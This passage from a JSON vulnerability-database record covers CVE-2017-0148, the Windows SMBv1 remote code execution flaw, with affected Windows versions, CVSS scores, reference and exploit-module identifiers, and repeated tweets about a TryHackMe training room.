"dd4a1fba31e29c6988f563bdeb65c80c", "key": "affectedConfiguration"}, {"hash": "dc7888ec5bcb36228c71cf6f35f01dee", "key": "references"}, {"hash": "0751f4e56f29adf827144e01a128331d", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "bdb1fd133bbc616329b17a26e814341c", "key": "extraReferences"}, {"hash": "e8dbb4c019811b96da3443b871bd4b26", "key": "cvss2"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": 
"d68798550042e5272198c20ea65d8f01", "key": "modified"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "a142b7b1b3b74c6f44646072d5968b9a", "key": "description"}, {"hash": "b99edf73073813cd4c0252d2eb2a41b1", "key": "cvelist"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0148", "id": "CVE-2017-0148", "immutableFields": [], "lastseen": "2021-02-02T06:36:30", "modified": "2018-06-21T01:29:00", "objectVersion": "1.5", "published": "2017-03-17T00:59:00", "references": ["http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0148", "http://www.securitytracker.com/id/1037991", "http://www.securityfocus.com/bid/96706", "https://www.exploit-db.com/exploits/41891/", "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html", "https://www.exploit-db.com/exploits/41987/", "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf"], "reporter": "cve@mitre.org", "title": "CVE-2017-0148", "type": "cve", "viewCount": 63}, "different_elements": ["reporter", "cpeConfiguration"], "edition": 6, "lastseen": "2021-02-02T06:36:30"}, {"bulletin": {"affectedConfiguration": [{"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1607"}, {"cpeName": "microsoft:windows_server_2008", "name": "microsoft windows server 2008", "operator": "eq", "version": "r2"}, {"cpeName": "microsoft:windows_rt_8.1", "name": "microsoft windows rt 8.1", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_8.1", "name": "microsoft windows 8.1", "operator": "eq", "version": "*"}, {"cpeName": "microsoft:windows_server_2012", "name": "microsoft windows server 2012", "operator": "eq", "version": "r2"}, {"cpeName": 
"microsoft:windows_server_2008", "name": "microsoft windows server 2008", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2012", "name": "microsoft windows server 2012", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_7", "name": "microsoft windows 7", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "*"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1511"}, {"cpeName": "microsoft:windows_vista", "name": "microsoft windows vista", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2016", "name": "microsoft windows server 2016", "operator": "eq", "version": "-"}], "affectedSoftware": [{"cpeName": "microsoft:server_message_block", "name": "microsoft server message block", "operator": "eq", "version": "1.0"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:microsoft:server_message_block:1.0"], "cpe23": ["cpe:2.3:a:microsoft:server_message_block:1.0:*:*:*:*:*:*:*"], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:microsoft:server_message_block:1.0:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}, {"cpe_match": [{"cpe23Uri": "cpe:2.3:o:microsoft:windows_8.1:*:*:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2012:-:gold:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1511:*:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*", 
"vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:*:*:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_vista:-:sp2:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "vulnerable": false}], "operator": "OR"}], "operator": "AND"}]}, "cvelist": ["CVE-2017-0148"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "cwe": ["CWE-20"], "description": "The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, aka \"Windows SMB Remote Code Execution Vulnerability.\" This vulnerability is different from those described in CVE-2017-0143, CVE-2017-0144, CVE-2017-0145, and CVE-2017-0146.", "edition": 5, "enchantments": {"dependencies": {"modified": 
"2020-10-03T13:07:29", "references": [{"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["ICSMA-18-058-02"], "type": "ics"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613"], "type": "zdt"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"], "type": "openvas"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"], "type": "attackerkb"}, {"idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"], "type": "thn"}, {"idList": ["SMNTC-96706"], "type": "symantec"}, {"idList": ["KLA11902", "KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["SSV:92952"], "type": "seebug"}, {"idList": ["MS:CVE-2017-0148"], "type": "mscve"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891"], "type": "exploitdb"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"], "type": "metasploit"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, 
"exploitation": {"modified": "2020-10-03T13:07:29", "wildExploited": true, "wildExploitedSources": [{"idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"], "type": "attackerkb"}]}, "score": {"modified": "2020-10-03T13:07:29", "rev": 2, "value": 9.3, "vector": "NONE"}, "twitter": {"counter": 26, "modified": "2020-10-03T13:07:29", "tweets": [{"link": "https://twitter.com/haisenb3rg/status/1355219896876101633", "text": "Blue - I have just completed this room! Check it out: https://t.co/wl8T2v20v5?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/0xMando/status/1354504708145213440", "text": "Blue - I have just completed this room! Check it out: https://t.co/CM3xc69bUu?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe I did it mom! /darkstar7471"}, {"link": "https://twitter.com/strudinox/status/1352367654514814976", "text": "Blue - I have just completed this room! 
Check it out: https://t.co/kUcxTcX0cK?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/DaemonExala/status/1355469648314163201", "text": "Blue - I have just completed this room! Check it out: https://t.co/pRJxaPlaBu?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue /hashtag/MS17?src=hashtag_click-010 /hashtag/CVE2017?src=hashtag_click-0144 /hashtag/CVE?src=hashtag_click-2017-0145 /hashtag/CVE?src=hashtag_click-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/td_dixit/status/1349910672750985216", "text": "Blue - I have just completed this room! Check it out: https://t.co/FGWdT3Euk8?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/mell0wx/status/1350568935335358464", "text": "Blue - I have just completed this room! 
Check it out: https://t.co/C1ARvEqI3z?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/Wrth1_/status/1350977622700937217", "text": "Blue - I have just completed this room! Check it out: https://t.co/Obry4AfJD1?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/reason2008/status/1352019208620683266", "text": "Blue - I have just completed this room! Check it out: https://t.co/eudEV3HK2W?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/m3t4ll0rdz/status/1353147857017176069", "text": "Blue - I have just completed this room! 
Check it out: https://t.co/6r4PlwLHqj?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/CreatureofHabi7/status/1351637620674211841", "text": "Blue - I have just completed this room! Check it out: https://t.co/RchZjhOQvw?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}]}}, "extraReferences": [], "hash": "97ee47bce2e8543269405dde542f5cc98bcac067016109291e27c873fd2aa2ee", "hashmap": [{"hash": "732a831a7eed3955e8de18b2d8903bc8", "key": "cvss3"}, {"hash": "d931342d7091edb0db4db482c531ce39", "key": "cpeConfiguration"}, {"hash": "f54a01beedb777f2ca261ddba30cf1a5", "key": "published"}, {"hash": "e758f8fa39ce9e8de2ffe527ec8b6423", "key": "affectedSoftware"}, {"hash": "226da5129ffaaee3d5b48e506b957d58", "key": "cwe"}, {"hash": "a173072793578541ea04b7baa0323592", "key": "cpe"}, {"hash": "3f9465465d68d8a7f86e1cb1f3804b2c", "key": "href"}, {"hash": "d726e774add6189e33cf2ea0c61a2ba5", "key": "cvss"}, {"hash": "6a3356b5136599746533482cee29bc14", "key": "title"}, {"hash": "dd4a1fba31e29c6988f563bdeb65c80c", "key": "affectedConfiguration"}, {"hash": "dc7888ec5bcb36228c71cf6f35f01dee", "key": "references"}, {"hash": "0751f4e56f29adf827144e01a128331d", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, 
{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "extraReferences"}, {"hash": "e8dbb4c019811b96da3443b871bd4b26", "key": "cvss2"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "d68798550042e5272198c20ea65d8f01", "key": "modified"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "a142b7b1b3b74c6f44646072d5968b9a", "key": "description"}, {"hash": "b99edf73073813cd4c0252d2eb2a41b1", "key": "cvelist"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0148", "id": "CVE-2017-0148", "lastseen": "2020-10-03T13:07:29", "modified": "2018-06-21T01:29:00", "objectVersion": "1.3", "published": "2017-03-17T00:59:00", "references": ["http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0148", "http://www.securitytracker.com/id/1037991", "http://www.securityfocus.com/bid/96706", "https://www.exploit-db.com/exploits/41891/", "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html", "https://www.exploit-db.com/exploits/41987/", "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf"], "reporter": "cve@mitre.org", "title": "CVE-2017-0148", "type": "cve", "viewCount": 56}, "differentElements": ["extraReferences"], "edition": 5, "lastseen": "2020-10-03T13:07:29"}], "edition": 7, "hashmap": [{"key": "affectedConfiguration", "hash": "dd4a1fba31e29c6988f563bdeb65c80c"}, {"key": "affectedSoftware", "hash": "e758f8fa39ce9e8de2ffe527ec8b6423"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "a173072793578541ea04b7baa0323592"}, {"key": "cpe23", "hash": "0751f4e56f29adf827144e01a128331d"}, {"key": "cpeConfiguration", "hash": "6ac681e59932d7c840205e984b11bad5"}, 
{"key": "cvelist", "hash": "b99edf73073813cd4c0252d2eb2a41b1"}, {"key": "cvss", "hash": "d726e774add6189e33cf2ea0c61a2ba5"}, {"key": "cvss2", "hash": "e8dbb4c019811b96da3443b871bd4b26"}, {"key": "cvss3", "hash": "732a831a7eed3955e8de18b2d8903bc8"}, {"key": "cwe", "hash": "226da5129ffaaee3d5b48e506b957d58"}, {"key": "description", "hash": "a142b7b1b3b74c6f44646072d5968b9a"}, {"key": "extraReferences", "hash": "bdb1fd133bbc616329b17a26e814341c"}, {"key": "href", "hash": "3f9465465d68d8a7f86e1cb1f3804b2c"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "d68798550042e5272198c20ea65d8f01"}, {"key": "published", "hash": "f54a01beedb777f2ca261ddba30cf1a5"}, {"key": "references", "hash": "dc7888ec5bcb36228c71cf6f35f01dee"}, {"key": "reporter", "hash": "029dfc07c499dc142a429cac0a029e99"}, {"key": "title", "hash": "6a3356b5136599746533482cee29bc14"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "427d73407a3d8e1b7b23a71614d396a8cdbe4f730fd534056cb6014d507067ae", "viewCount": 124, "enchantments": {"dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0148"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", 
"AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "nessus", "idList": ["700059.PRM", "MS17-010.NASL", "700099.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:47456", "EDB-ID:41987"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA10977", "KLA11902"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-04-23T00:07:42", "rev": 2}, "exploitation": {"wildExploited": true, "wildExploitedSources": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}], "modified": "2021-04-23T00:07:42"}, "score": {"value": 9.3, "vector": "NONE", "modified": "2021-04-23T00:07:42", "rev": 2}, "twitter": {"counter": 87, "tweets": [{"link": "https://twitter.com/RonnyArias/status/1422356892483981314", "text": "Blue - I have just completed this room! 
Check it out: https://t.co/TJq1bBTWoK?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/QuentinCasares/status/1422521751523762177", "text": "Blue - I have just completed this room! Check it out: https://t.co/0l0HtT6bML?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/shadow44406573/status/1423260611429998593", "text": "Blue - I have just completed this room! Check it out: https://t.co/sijYaXhkoQ?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/top_wizard/status/1423289010630270995", "text": "Blue - I have just completed this room! 
Check it out: https://t.co/1ICOkz0X0h?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/InfoSec_MBE/status/1425558031790657546", "text": "Blue - I have just completed this room! Check it out: https://t.co/Tms9b4JF84?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/uk_NJx/status/1426573521308762112", "text": "Blue - I have just completed this room! Check it out: https://t.co/B1WGZBexHA?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/carlos_o_m/status/1426612611009892352", "text": "Blue - I have just completed this room! 
Check it out: https://t.co/6jaCHwnUja?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click a trav\u00e9s de /RealTryHackMe"}, {"link": "https://twitter.com/AynRandSucks/status/1429439489068306434", "text": "Blue - I have just completed this room! Check it out: https://t.co/Ypt3f3Ra8A?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/cts_technology/status/1429414666082607108", "text": "Finally!\nBlue - I have just completed this room! Check it out: https://t.co/hJYxVXD4we?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/0x6d61/status/1430147082573074436", "text": "Blue - I have just completed this room! 
